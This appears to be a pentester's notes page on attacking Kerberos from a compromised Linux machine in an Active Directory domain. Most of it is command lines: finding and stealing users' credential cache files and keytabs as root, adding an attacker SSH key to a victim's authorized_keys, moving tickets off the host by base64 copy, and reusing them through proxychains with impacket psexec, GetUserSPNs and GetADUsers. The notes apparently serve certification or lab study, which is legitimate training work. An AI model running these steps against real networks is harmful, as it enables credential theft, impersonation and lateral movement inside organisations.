Kerberos

after AD users log in to the victim linux machine with AD credentials

Enum credential cache location: env | grep KRB5CCNAME

List currently stored tickets in credential cachefile: klist

Request TGT (need current user's AD pwd): kinit

Renew within renewal timeframe w/o pwd: kinit -R

List SPN with cached ticket:

cat /etc/krb5.conf #check realm

kvno ldap/[email protected] #case sensitive realm match krb5.conf

sudo echo "172.16.202.180 dc01.final.com final.com" >> /etc/hosts #for ldap connect

ldapsearch -Y GSSAPI -H ldap://dc01.corp1.com -D "[email protected]" -W -b "dc=corp1,dc=com" "servicePrincipalName=*" servicePrincipalName

Request service ticket (from listed SPN): kvno MSSQLSvc/DC01.corp1.com:1433

Discord - Group Chat That’s All Fun & GamesDiscord

keytab

Examine the contents of files like /etc/crontab to determine which scripts are being run and then examine those scripts to see whether they are using keytabs for authentication. Paths to keytab files used in these scripts may also reveal which users are associated with which keytabs.

However, let's imagine a scenario where we've gotten root access to this box. If we discover the keytab file, we can use it maliciously to gain access to other systems as the keytab user.

kinit [email protected] -k -t /home/user/user.keytab

Ticket Usage after ticket in klist

smbclient -k -U "CORP1.COM\user_or_admin" //host_or_DC01.CORP1.COM/C$

Steal & Use Crendential Cache File (as root)

If we compromise an active user's shell session, we can essentially act as the user in question and use their current Kerberos tickets. Gaining an initial TGT would require the user's Active Directory password. However, if the user is already authenticated, we can just use their current tickets.

To authenticate by compromising a user's ccache file, a user's ccache file is stored in /tmp with a format like /tmp/krb5cc_{random} and is typically only accessible by the owner so it is unlikely that we will be able to steal a user's ccache file as an unprivileged user.

check with last to see if other user logined to the machine

then echo {kali id_rsa} >> /home/theuser/.ssh/authorized_keys

ssh into that account to view its /tmp/krb5cc and copy it out to kali

If we have privileged access and don't want to log in as the user in question, or we are able to read the user's files but don't have direct shell access, we can still copy the victim's ccache file and load it as our own.

We can inspect the file owners of the ccache file to determine target user to steal.

Find krb5cc_*

ls -la /tmp

Copy ccache & set owner

cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow

chown compromiseduser:compromisedusergrp /tmp/krb5cc_minenow

In order to use the ccache file, we need to set the KRB5CCNAME environment variable we discussed earlier. This variable gives the path of the credential cache file so that Kerberos utilities can find it.

Use

kdestroy
klist
export KRB5CCNAME=/tmp/krb5cc_minenow
klist

Based on the output, we now have the administrator user's TGT in our credential cache and we can request service tickets on their behalf. Now that we have the user's Kerberos tickets, we can use those tickets to authenticate to services that are Kerberos-enabled on the user's behalf.

kvno ldap/[email protected]

need ldap ticket before bloodhound collection

Use in Kali

Transfer the ccache

victim

base64 -w0 /tmp/krb5cc_607000500_3aeIA5

kali

echo -n '{copy output from from victim}'| base64 --decode > /tmp/krb5cc_copied

Setup

kali

export KRB5CCNAME=/tmp/krb5cc_copied
klist

sudo apt install krb5-user
host corp1.com
sudo echo '192.168.120.5 CORP1.COM DC01.CORP1.COM' >> /etc/hosts

setup socks ser on jumper

ssh compromiseduser@jumper -D 9050

Usage

python3 /usr/share/doc/python3-impacket/examples/psexec.py 

proxychains impacket-psexec user@hostname_or_DC01.CORP1.COM -k -no-pass

-or-

proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py user@hostname_or_DC01.CORP1.COM -k -no-pass -dc-ip {dc_ip} -target-ip {target_ip}

other usage

proxychains python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all -k -no-pass -dc-ip 192.168.120.5 CORP1.COM/user

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -no-pass -dc-ip 192.168.120.5 CORP1.COM/user

.kirbi to ccache

impacket/examples/ticketConverter.py at master · fortra/impacketGitHub

impacket-ticketconverter exported.kirbi /tmp/krb5cc_kirbi

#multiple .kirbi in kirbi folder
minikerberos-kirbi2ccache ./kirbi ./krb5cc_pete
export KRB5CCNAME=`pwd`/'krb5cc_pete'

PreviousArtifactory NextLigolo

Last updated 1 year ago

hashtagkeytab

hashtagTicket Usage after ticket in klist

hashtagSteal & Use Crendential Cache File (as root)

hashtagUse in Kali

hashtagTransfer the ccache

hashtagSetup

hashtagUsage

hashtag.kirbi to ccache